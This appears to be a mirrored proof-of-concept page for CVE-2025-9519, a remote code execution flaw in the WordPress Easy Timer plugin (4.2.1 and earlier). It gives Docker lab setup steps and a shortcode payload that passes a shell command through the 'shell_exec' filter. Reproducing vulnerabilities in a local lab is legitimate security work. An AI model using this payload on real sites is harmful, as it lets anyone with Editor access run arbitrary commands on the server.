Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-9519 PoC — Easy Timer <= 4.2.1 - Authenticated (Editor+) Remote Code Execution via Shortcode

Source
https://github.com/Nimisha17/Poc-CVE-2025-9519
Associated Vulnerability
Title:Easy Timer <= 4.2.1 - Authenticated (Editor+) Remote Code Execution via Shortcode (CVE-2025-9519)
Description:The Easy Timer plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.2.1 via the plugin's shortcodes. This is due to insufficient restriction of shortcode attributes. This makes it possible for authenticated attackers, with Editor-level access and above, to execute code on the server.
Readme
# Easy Timer v4.2.1 - 

## Prerequisites

* Docker Engine installed
* Docker Compose installed

Refer to the official Docker docs for installation: [Docker Engine Install](https://docs.docker.com/engine/install/)

## 1. Start WordPress with Docker

From your project directory:

```bash
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins

wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip

sudo docker compose restart wordpress
```

## 2. Set Up WordPress

1. Navigate to `http://localhost:8000/`
2. Complete the WordPress Setup
3. Navigate to `WordPress Dashboard` → `Plugins` → `Easy Timer` and click `Activate`.
<img width="740" height="325" alt="Screenshot from 2025-10-27 12-52-06" src="https://github.com/user-attachments/assets/91f6d1b6-83c4-4781-b3fa-d5be4d218c3e" />

## 3. Add new user with Editor Privileges

From your project directory execute the following command:
```bash
docker compose run --rm wpcli user create \
  editoruser editoruser@example.com \
  --role=editor \
  --user_pass=P@ssw0rd!
```
(note: replace with your choice of user name, email and password!)

## 4. Create Post

1. Go to `Posts` → `Add New`
2. Insert a `Shortcode block` and enter:

```text
[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
```

3. Click **Update → Preview Post** to see the timer execute.

> ⚠️ Note: Ensure you are using a **Shortcode block**, not a Paragraph block, for the shortcode to render properly.

<img width="681" height="278" alt="Screenshot from 2025-10-27 13-36-40" src="https://github.com/user-attachments/assets/00672fbd-9f1e-4a99-9508-f20f91488252" />

---
Congratz you got RCE.
<img width="944" height="620" alt="image" src="https://github.com/user-attachments/assets/2adc719c-4556-4a15-a216-9542a458c8b1" />




## Debugging Tips

* Check running containers:

```bash
sudo docker ps
```

You should see something like:

<img width="1174" height="121" alt="Screenshot from 2025-10-27 12-51-08" src="https://github.com/user-attachments/assets/41599c77-12b2-482e-b349-a79075e45ae7" />


* If shortcodes are **not rendering**:

  1. Go to **Appearance → Themes**
  2. Activate **Twenty Twenty-Three** (or another default theme).


* If navigating to `http://localhost:8000/` says **Database Not Connected**:
  1. Wait a minute or two for the Database to finish setting up
File Snapshot

 [4.0K]  /data/pocs/3f14b7235427f3dd73b811decfcab2e3d075b987
├── [1.1K]  docker-compose.yml
└── [2.3K]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →